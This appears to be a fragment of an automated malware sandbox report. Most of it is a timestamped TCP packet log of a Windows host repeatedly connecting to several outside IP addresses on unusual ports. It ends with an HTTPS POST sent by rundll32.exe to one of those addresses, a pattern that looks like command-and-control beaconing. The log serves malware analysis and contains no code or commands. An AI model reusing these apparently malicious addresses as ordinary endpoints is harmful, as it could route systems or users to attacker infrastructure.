Oct 28, 2021 05:29:01.104268074 CEST	50132	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:29:01.104374886 CEST	50132	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:29:01.222402096 CEST	808	50131	143.244.140.214	192.168.2.3
Oct 28, 2021 05:29:01.226335049 CEST	808	50131	143.244.140.214	192.168.2.3
Oct 28, 2021 05:29:01.226360083 CEST	808	50131	143.244.140.214	192.168.2.3
Oct 28, 2021 05:29:01.226371050 CEST	808	50131	143.244.140.214	192.168.2.3
Oct 28, 2021 05:29:01.226392984 CEST	808	50131	143.244.140.214	192.168.2.3
Oct 28, 2021 05:29:01.248476982 CEST	808	50132	143.244.140.214	192.168.2.3
Oct 28, 2021 05:29:01.262413979 CEST	808	50132	143.244.140.214	192.168.2.3
Oct 28, 2021 05:29:01.262439013 CEST	808	50132	143.244.140.214	192.168.2.3
Oct 28, 2021 05:29:01.262445927 CEST	808	50132	143.244.140.214	192.168.2.3
Oct 28, 2021 05:29:01.262453079 CEST	808	50132	143.244.140.214	192.168.2.3
Oct 28, 2021 05:29:01.620359898 CEST	808	50131	143.244.140.214	192.168.2.3
Oct 28, 2021 05:29:01.620389938 CEST	808	50131	143.244.140.214	192.168.2.3
Oct 28, 2021 05:29:01.620452881 CEST	50131	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:29:01.620479107 CEST	50131	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:29:01.628088951 CEST	50131	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:29:01.644196987 CEST	808	50132	143.244.140.214	192.168.2.3
Oct 28, 2021 05:29:01.644227982 CEST	808	50132	143.244.140.214	192.168.2.3
Oct 28, 2021 05:29:01.644387960 CEST	50132	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:29:01.647155046 CEST	50132	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:29:01.743211985 CEST	50133	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:29:01.780246973 CEST	50134	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:29:01.787636995 CEST	808	50131	143.244.140.214	192.168.2.3
Oct 28, 2021 05:29:01.805392027 CEST	808	50132	143.244.140.214	192.168.2.3
Oct 28, 2021 05:29:01.911490917 CEST	6891	50133	45.77.0.96	192.168.2.3
Oct 28, 2021 05:29:01.911608934 CEST	50133	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:29:01.912261963 CEST	50133	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:29:01.946435928 CEST	6891	50134	45.77.0.96	192.168.2.3
Oct 28, 2021 05:29:01.946603060 CEST	50134	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:29:01.947555065 CEST	50134	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:29:02.079456091 CEST	6891	50133	45.77.0.96	192.168.2.3
Oct 28, 2021 05:29:02.079612017 CEST	6891	50133	45.77.0.96	192.168.2.3
Oct 28, 2021 05:29:02.079725027 CEST	50133	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:29:02.080214977 CEST	50133	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:29:02.113528013 CEST	6891	50134	45.77.0.96	192.168.2.3
Oct 28, 2021 05:29:02.113635063 CEST	6891	50134	45.77.0.96	192.168.2.3
Oct 28, 2021 05:29:02.113697052 CEST	50134	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:29:02.114507914 CEST	50134	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:29:02.118877888 CEST	50133	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:29:02.118957043 CEST	50133	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:29:02.120296955 CEST	50134	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:29:02.120459080 CEST	50134	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:29:02.283201933 CEST	6891	50133	45.77.0.96	192.168.2.3
Oct 28, 2021 05:29:02.285042048 CEST	6891	50133	45.77.0.96	192.168.2.3
Oct 28, 2021 05:29:02.285063028 CEST	6891	50133	45.77.0.96	192.168.2.3
Oct 28, 2021 05:29:02.285070896 CEST	6891	50133	45.77.0.96	192.168.2.3
Oct 28, 2021 05:29:02.286302090 CEST	6891	50134	45.77.0.96	192.168.2.3
Oct 28, 2021 05:29:02.286433935 CEST	6891	50134	45.77.0.96	192.168.2.3
Oct 28, 2021 05:29:02.670136929 CEST	6891	50134	45.77.0.96	192.168.2.3
Oct 28, 2021 05:29:02.670166016 CEST	6891	50134	45.77.0.96	192.168.2.3
Oct 28, 2021 05:29:02.670209885 CEST	50134	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:29:02.670249939 CEST	50134	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:29:02.671670914 CEST	6891	50133	45.77.0.96	192.168.2.3
Oct 28, 2021 05:29:02.671699047 CEST	6891	50133	45.77.0.96	192.168.2.3
Oct 28, 2021 05:29:02.671751022 CEST	50133	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:29:02.672655106 CEST	50134	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:29:02.678133011 CEST	50133	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:29:02.791198015 CEST	50135	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:29:02.794498920 CEST	50136	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:29:02.838649035 CEST	6891	50134	45.77.0.96	192.168.2.3
Oct 28, 2021 05:29:02.838680983 CEST	8116	50135	185.56.219.47	192.168.2.3
Oct 28, 2021 05:29:02.841408014 CEST	50135	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:29:02.842529058 CEST	50135	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:29:02.843425035 CEST	8116	50136	185.56.219.47	192.168.2.3
Oct 28, 2021 05:29:02.843645096 CEST	50136	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:29:02.844041109 CEST	6891	50133	45.77.0.96	192.168.2.3
Oct 28, 2021 05:29:02.845025063 CEST	50136	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:29:02.889841080 CEST	8116	50135	185.56.219.47	192.168.2.3
Oct 28, 2021 05:29:02.890069962 CEST	8116	50135	185.56.219.47	192.168.2.3
Oct 28, 2021 05:29:02.890166998 CEST	50135	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:29:02.890724897 CEST	50135	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:29:02.893767118 CEST	8116	50136	185.56.219.47	192.168.2.3
Oct 28, 2021 05:29:02.893915892 CEST	8116	50136	185.56.219.47	192.168.2.3
Oct 28, 2021 05:29:02.894046068 CEST	50136	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:29:02.894637108 CEST	50135	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:29:02.894781113 CEST	50135	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:29:02.895230055 CEST	50136	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:29:02.899194002 CEST	50136	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:29:02.899379015 CEST	50136	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:29:02.941962004 CEST	8116	50135	185.56.219.47	192.168.2.3
Oct 28, 2021 05:29:02.942262888 CEST	8116	50135	185.56.219.47	192.168.2.3
Oct 28, 2021 05:29:02.947974920 CEST	8116	50136	185.56.219.47	192.168.2.3
Oct 28, 2021 05:29:02.948405981 CEST	8116	50136	185.56.219.47	192.168.2.3
Oct 28, 2021 05:29:03.122059107 CEST	8116	50136	185.56.219.47	192.168.2.3
Oct 28, 2021 05:29:03.122086048 CEST	8116	50136	185.56.219.47	192.168.2.3
Oct 28, 2021 05:29:03.122235060 CEST	50136	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:29:03.122272015 CEST	50136	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:29:03.125324965 CEST	50136	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:29:03.125962019 CEST	8116	50135	185.56.219.47	192.168.2.3
Oct 28, 2021 05:29:03.125984907 CEST	8116	50135	185.56.219.47	192.168.2.3
Oct 28, 2021 05:29:03.126100063 CEST	50135	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:29:03.133730888 CEST	50135	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:29:03.174082994 CEST	8116	50136	185.56.219.47	192.168.2.3
Oct 28, 2021 05:29:03.181067944 CEST	8116	50135	185.56.219.47	192.168.2.3
Oct 28, 2021 05:29:03.246767998 CEST	50137	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:29:03.246836901 CEST	443	50137	192.46.210.220	192.168.2.3
Oct 28, 2021 05:29:03.246956110 CEST	50137	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:29:03.247730970 CEST	50137	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:29:03.247759104 CEST	443	50137	192.46.210.220	192.168.2.3
Oct 28, 2021 05:29:03.250155926 CEST	50138	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:29:03.250200033 CEST	443	50138	192.46.210.220	192.168.2.3
Oct 28, 2021 05:29:03.250672102 CEST	50138	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:29:03.251672983 CEST	50138	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:29:03.251693964 CEST	443	50138	192.46.210.220	192.168.2.3
Oct 28, 2021 05:29:03.777570963 CEST	443	50138	192.46.210.220	192.168.2.3
Oct 28, 2021 05:29:03.777755976 CEST	50138	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:29:03.778557062 CEST	50138	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:29:03.778574944 CEST	443	50138	192.46.210.220	192.168.2.3
Oct 28, 2021 05:29:03.778805017 CEST	443	50137	192.46.210.220	192.168.2.3
Oct 28, 2021 05:29:03.778907061 CEST	50137	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:29:03.779503107 CEST	50137	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:29:03.779520988 CEST	443	50137	192.46.210.220	192.168.2.3
Oct 28, 2021 05:29:03.784296036 CEST	50137	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:29:03.784321070 CEST	443	50137	192.46.210.220	192.168.2.3
Oct 28, 2021 05:29:03.784400940 CEST	50137	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:29:03.784414053 CEST	443	50137	192.46.210.220	192.168.2.3
Oct 28, 2021 05:29:03.786603928 CEST	50138	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:29:03.786623955 CEST	443	50138	192.46.210.220	192.168.2.3
Oct 28, 2021 05:29:03.786768913 CEST	50138	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:29:03.786786079 CEST	443	50138	192.46.210.220	192.168.2.3
Oct 28, 2021 05:29:04.496812105 CEST	443	50137	192.46.210.220	192.168.2.3
Oct 28, 2021 05:29:04.496901989 CEST	443	50137	192.46.210.220	192.168.2.3
Oct 28, 2021 05:29:04.496990919 CEST	50137	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:29:04.497013092 CEST	50137	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:29:04.499319077 CEST	443	50138	192.46.210.220	192.168.2.3
Oct 28, 2021 05:29:04.499378920 CEST	443	50138	192.46.210.220	192.168.2.3
Oct 28, 2021 05:29:04.499454975 CEST	50138	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:29:04.499481916 CEST	50138	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:29:04.502831936 CEST	50138	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:29:04.502854109 CEST	443	50138	192.46.210.220	192.168.2.3
Oct 28, 2021 05:29:04.505171061 CEST	50137	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:29:04.505184889 CEST	443	50137	192.46.210.220	192.168.2.3
Oct 28, 2021 05:29:04.621048927 CEST	50139	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:29:04.624929905 CEST	50140	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:29:04.779911041 CEST	808	50139	143.244.140.214	192.168.2.3
Oct 28, 2021 05:29:04.780021906 CEST	50139	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:29:04.780632019 CEST	50139	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:29:04.787158966 CEST	808	50140	143.244.140.214	192.168.2.3
Oct 28, 2021 05:29:04.787257910 CEST	50140	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:29:04.787944078 CEST	50140	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:29:04.939188004 CEST	808	50139	143.244.140.214	192.168.2.3
Oct 28, 2021 05:29:04.939292908 CEST	808	50139	143.244.140.214	192.168.2.3
Oct 28, 2021 05:29:04.939368010 CEST	50139	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:29:04.939951897 CEST	50139	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:29:04.943989992 CEST	50139	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:29:04.944118023 CEST	50139	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:29:04.949832916 CEST	808	50140	143.244.140.214	192.168.2.3
Oct 28, 2021 05:29:04.950095892 CEST	808	50140	143.244.140.214	192.168.2.3
Oct 28, 2021 05:29:04.950167894 CEST	50140	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:29:04.950747967 CEST	50140	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:29:04.954571009 CEST	50140	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:29:04.954699993 CEST	50140	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:29:05.099322081 CEST	808	50139	143.244.140.214	192.168.2.3
Oct 28, 2021 05:29:05.104228973 CEST	808	50139	143.244.140.214	192.168.2.3
Oct 28, 2021 05:29:05.104254961 CEST	808	50139	143.244.140.214	192.168.2.3
Oct 28, 2021 05:29:05.104264975 CEST	808	50139	143.244.140.214	192.168.2.3
Oct 28, 2021 05:29:05.114363909 CEST	808	50140	143.244.140.214	192.168.2.3
Oct 28, 2021 05:29:05.116400003 CEST	808	50140	143.244.140.214	192.168.2.3
Oct 28, 2021 05:29:05.116421938 CEST	808	50140	143.244.140.214	192.168.2.3
Oct 28, 2021 05:29:05.116431952 CEST	808	50140	143.244.140.214	192.168.2.3
Oct 28, 2021 05:29:05.116461039 CEST	808	50140	143.244.140.214	192.168.2.3
Oct 28, 2021 05:29:05.489316940 CEST	808	50139	143.244.140.214	192.168.2.3
Oct 28, 2021 05:29:05.489360094 CEST	808	50139	143.244.140.214	192.168.2.3
Oct 28, 2021 05:29:05.489495039 CEST	50139	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:29:05.495171070 CEST	50139	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:29:05.505891085 CEST	808	50140	143.244.140.214	192.168.2.3
Oct 28, 2021 05:29:05.505914927 CEST	808	50140	143.244.140.214	192.168.2.3
Oct 28, 2021 05:29:05.506041050 CEST	50140	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:29:05.506074905 CEST	50140	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:29:05.508327007 CEST	50140	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:29:05.617157936 CEST	50141	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:29:05.632247925 CEST	50142	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:29:05.653556108 CEST	808	50139	143.244.140.214	192.168.2.3
Oct 28, 2021 05:29:05.670356989 CEST	808	50140	143.244.140.214	192.168.2.3
Oct 28, 2021 05:29:05.783229113 CEST	6891	50141	45.77.0.96	192.168.2.3
Oct 28, 2021 05:29:05.783346891 CEST	50141	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:29:05.784117937 CEST	50141	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:29:05.798341990 CEST	6891	50142	45.77.0.96	192.168.2.3
Oct 28, 2021 05:29:05.798554897 CEST	50142	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:29:05.799128056 CEST	50142	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:29:05.950038910 CEST	6891	50141	45.77.0.96	192.168.2.3
Oct 28, 2021 05:29:05.950097084 CEST	6891	50141	45.77.0.96	192.168.2.3
Oct 28, 2021 05:29:05.950161934 CEST	50141	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:29:05.950722933 CEST	50141	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:29:05.954561949 CEST	50141	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:29:05.954658031 CEST	50141	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:29:05.965009928 CEST	6891	50142	45.77.0.96	192.168.2.3
Oct 28, 2021 05:29:05.965099096 CEST	6891	50142	45.77.0.96	192.168.2.3
Oct 28, 2021 05:29:05.965298891 CEST	50142	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:29:05.965986967 CEST	50142	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:29:05.970594883 CEST	50142	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:29:05.970698118 CEST	50142	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:29:06.120760918 CEST	6891	50141	45.77.0.96	192.168.2.3
Oct 28, 2021 05:29:06.120784998 CEST	6891	50141	45.77.0.96	192.168.2.3
Oct 28, 2021 05:29:06.136939049 CEST	6891	50142	45.77.0.96	192.168.2.3
Oct 28, 2021 05:29:06.136961937 CEST	6891	50142	45.77.0.96	192.168.2.3
Oct 28, 2021 05:29:06.136969090 CEST	6891	50142	45.77.0.96	192.168.2.3
Oct 28, 2021 05:29:06.159225941 CEST	6891	50141	45.77.0.96	192.168.2.3
Oct 28, 2021 05:29:06.498018980 CEST	6891	50141	45.77.0.96	192.168.2.3
Oct 28, 2021 05:29:06.498048067 CEST	6891	50141	45.77.0.96	192.168.2.3
Oct 28, 2021 05:29:06.498269081 CEST	50141	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:29:06.498356104 CEST	50141	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:29:06.505827904 CEST	50141	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:29:06.519711971 CEST	6891	50142	45.77.0.96	192.168.2.3
Oct 28, 2021 05:29:06.519737959 CEST	6891	50142	45.77.0.96	192.168.2.3
Oct 28, 2021 05:29:06.519977093 CEST	50142	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:29:06.522913933 CEST	50142	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:29:06.618428946 CEST	50143	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:29:06.671894073 CEST	6891	50141	45.77.0.96	192.168.2.3
Oct 28, 2021 05:29:06.675679922 CEST	8116	50143	185.56.219.47	192.168.2.3
Oct 28, 2021 05:29:06.675842047 CEST	50143	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:29:06.676829100 CEST	50143	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:29:06.683855057 CEST	50144	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:29:06.689480066 CEST	6891	50142	45.77.0.96	192.168.2.3
Oct 28, 2021 05:29:06.731076002 CEST	8116	50144	185.56.219.47	192.168.2.3
Oct 28, 2021 05:29:06.731283903 CEST	50144	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:29:06.732054949 CEST	50144	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:29:06.733788013 CEST	8116	50143	185.56.219.47	192.168.2.3
Oct 28, 2021 05:29:06.734405041 CEST	8116	50143	185.56.219.47	192.168.2.3
Oct 28, 2021 05:29:06.734510899 CEST	50143	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:29:06.735002995 CEST	50143	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:29:06.746407986 CEST	50143	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:29:06.746659040 CEST	50143	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:29:06.779251099 CEST	8116	50144	185.56.219.47	192.168.2.3
Oct 28, 2021 05:29:06.779469967 CEST	8116	50144	185.56.219.47	192.168.2.3
Oct 28, 2021 05:29:06.779565096 CEST	50144	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:29:06.780162096 CEST	50144	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:29:06.783904076 CEST	50144	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:29:06.784044027 CEST	50144	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:29:06.803720951 CEST	8116	50143	185.56.219.47	192.168.2.3
Oct 28, 2021 05:29:06.804034948 CEST	8116	50143	185.56.219.47	192.168.2.3
Oct 28, 2021 05:29:06.830939054 CEST	8116	50144	185.56.219.47	192.168.2.3
Oct 28, 2021 05:29:06.830977917 CEST	8116	50144	185.56.219.47	192.168.2.3
Oct 28, 2021 05:29:06.989279032 CEST	8116	50143	185.56.219.47	192.168.2.3
Oct 28, 2021 05:29:06.989305973 CEST	8116	50143	185.56.219.47	192.168.2.3
Oct 28, 2021 05:29:06.989419937 CEST	50143	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:29:06.989504099 CEST	50143	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:29:06.997282982 CEST	50143	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:29:07.029016972 CEST	8116	50144	185.56.219.47	192.168.2.3
Oct 28, 2021 05:29:07.029042006 CEST	8116	50144	185.56.219.47	192.168.2.3
Oct 28, 2021 05:29:07.029159069 CEST	50144	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:29:07.029208899 CEST	50144	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:29:07.032373905 CEST	50144	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:29:07.054348946 CEST	8116	50143	185.56.219.47	192.168.2.3
Oct 28, 2021 05:29:07.079624891 CEST	8116	50144	185.56.219.47	192.168.2.3
Oct 28, 2021 05:29:07.118127108 CEST	50145	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:29:07.118180990 CEST	443	50145	192.46.210.220	192.168.2.3
Oct 28, 2021 05:29:07.118302107 CEST	50145	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:29:07.118916988 CEST	50145	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:29:07.118927002 CEST	443	50145	192.46.210.220	192.168.2.3
Oct 28, 2021 05:29:07.152677059 CEST	50146	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:29:07.152730942 CEST	443	50146	192.46.210.220	192.168.2.3
Oct 28, 2021 05:29:07.152870893 CEST	50146	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:29:07.153347015 CEST	50146	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:29:07.153359890 CEST	443	50146	192.46.210.220	192.168.2.3
Oct 28, 2021 05:29:07.640162945 CEST	443	50145	192.46.210.220	192.168.2.3
Oct 28, 2021 05:29:07.640261889 CEST	50145	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:29:07.640877962 CEST	50145	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:29:07.640893936 CEST	443	50145	192.46.210.220	192.168.2.3
Oct 28, 2021 05:29:07.646425962 CEST	50145	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:29:07.646439075 CEST	443	50145	192.46.210.220	192.168.2.3
Oct 28, 2021 05:29:07.646526098 CEST	50145	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:29:07.646533966 CEST	443	50145	192.46.210.220	192.168.2.3
Oct 28, 2021 05:29:07.667661905 CEST	443	50146	192.46.210.220	192.168.2.3
Oct 28, 2021 05:29:07.667740107 CEST	50146	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:29:07.668361902 CEST	50146	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:29:07.668378115 CEST	443	50146	192.46.210.220	192.168.2.3
Oct 28, 2021 05:29:07.673851967 CEST	50146	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:29:07.673876047 CEST	443	50146	192.46.210.220	192.168.2.3
Oct 28, 2021 05:29:07.673996925 CEST	50146	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:29:07.674006939 CEST	443	50146	192.46.210.220	192.168.2.3
Oct 28, 2021 05:29:08.353058100 CEST	443	50145	192.46.210.220	192.168.2.3
Oct 28, 2021 05:29:08.353131056 CEST	443	50145	192.46.210.220	192.168.2.3
Oct 28, 2021 05:29:08.353148937 CEST	50145	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:29:08.353204012 CEST	50145	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:29:08.360310078 CEST	50145	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:29:08.360341072 CEST	443	50145	192.46.210.220	192.168.2.3
Oct 28, 2021 05:29:08.379654884 CEST	443	50146	192.46.210.220	192.168.2.3
Oct 28, 2021 05:29:08.379723072 CEST	443	50146	192.46.210.220	192.168.2.3
Oct 28, 2021 05:29:08.379750013 CEST	50146	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:29:08.379781961 CEST	50146	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:29:08.382899046 CEST	50146	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:29:08.382920980 CEST	443	50146	192.46.210.220	192.168.2.3
Oct 28, 2021 05:29:08.478230953 CEST	50147	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:29:08.498173952 CEST	50148	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:29:08.636408091 CEST	808	50147	143.244.140.214	192.168.2.3
Oct 28, 2021 05:29:08.636516094 CEST	50147	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:29:08.637233019 CEST	50147	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:29:08.661075115 CEST	808	50148	143.244.140.214	192.168.2.3
Oct 28, 2021 05:29:08.661189079 CEST	50148	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:29:08.661748886 CEST	50148	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:29:08.795317888 CEST	808	50147	143.244.140.214	192.168.2.3
Oct 28, 2021 05:29:08.795352936 CEST	808	50147	143.244.140.214	192.168.2.3
Oct 28, 2021 05:29:08.795799971 CEST	50147	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:29:08.796360970 CEST	50147	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:29:08.800260067 CEST	50147	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:29:08.800352097 CEST	50147	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:29:08.824546099 CEST	808	50148	143.244.140.214	192.168.2.3
Oct 28, 2021 05:29:08.824577093 CEST	808	50148	143.244.140.214	192.168.2.3
Oct 28, 2021 05:29:08.825932026 CEST	50148	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:29:08.826333046 CEST	50148	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:29:08.828943968 CEST	50148	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:29:08.829018116 CEST	50148	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:29:08.954344988 CEST	808	50147	143.244.140.214	192.168.2.3
Oct 28, 2021 05:29:08.958240986 CEST	808	50147	143.244.140.214	192.168.2.3
Oct 28, 2021 05:29:08.958261013 CEST	808	50147	143.244.140.214	192.168.2.3
Oct 28, 2021 05:29:08.958270073 CEST	808	50147	143.244.140.214	192.168.2.3
Oct 28, 2021 05:29:08.990714073 CEST	808	50148	143.244.140.214	192.168.2.3
Oct 28, 2021 05:29:08.991699934 CEST	808	50148	143.244.140.214	192.168.2.3
Oct 28, 2021 05:29:08.991712093 CEST	808	50148	143.244.140.214	192.168.2.3
Oct 28, 2021 05:29:08.991719961 CEST	808	50148	143.244.140.214	192.168.2.3
Oct 28, 2021 05:29:09.340658903 CEST	808	50147	143.244.140.214	192.168.2.3
Oct 28, 2021 05:29:09.340687037 CEST	808	50147	143.244.140.214	192.168.2.3
Oct 28, 2021 05:29:09.340781927 CEST	50147	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:29:09.340817928 CEST	50147	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:29:09.348433018 CEST	50147	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:29:09.371628046 CEST	808	50148	143.244.140.214	192.168.2.3
Oct 28, 2021 05:29:09.371653080 CEST	808	50148	143.244.140.214	192.168.2.3
Oct 28, 2021 05:29:09.371784925 CEST	50148	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:29:09.371838093 CEST	50148	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:29:09.374694109 CEST	50148	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:29:09.506372929 CEST	808	50147	143.244.140.214	192.168.2.3
Oct 28, 2021 05:29:09.537478924 CEST	808	50148	143.244.140.214	192.168.2.3

HTTP Request Dependency Graph

192.46.210.220

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.3	49745	192.46.210.220	443	C:\Windows\SysWOW64\rundll32.exe

Timestamp	kBytes transferred	Direction	Data
2021-10-28 03:26:13 UTC	0	OUT	POST / HTTP/1.1 Host: 192.46.210.220 Content-Length: 4814 Connection: Close Cache-Control: no-cache
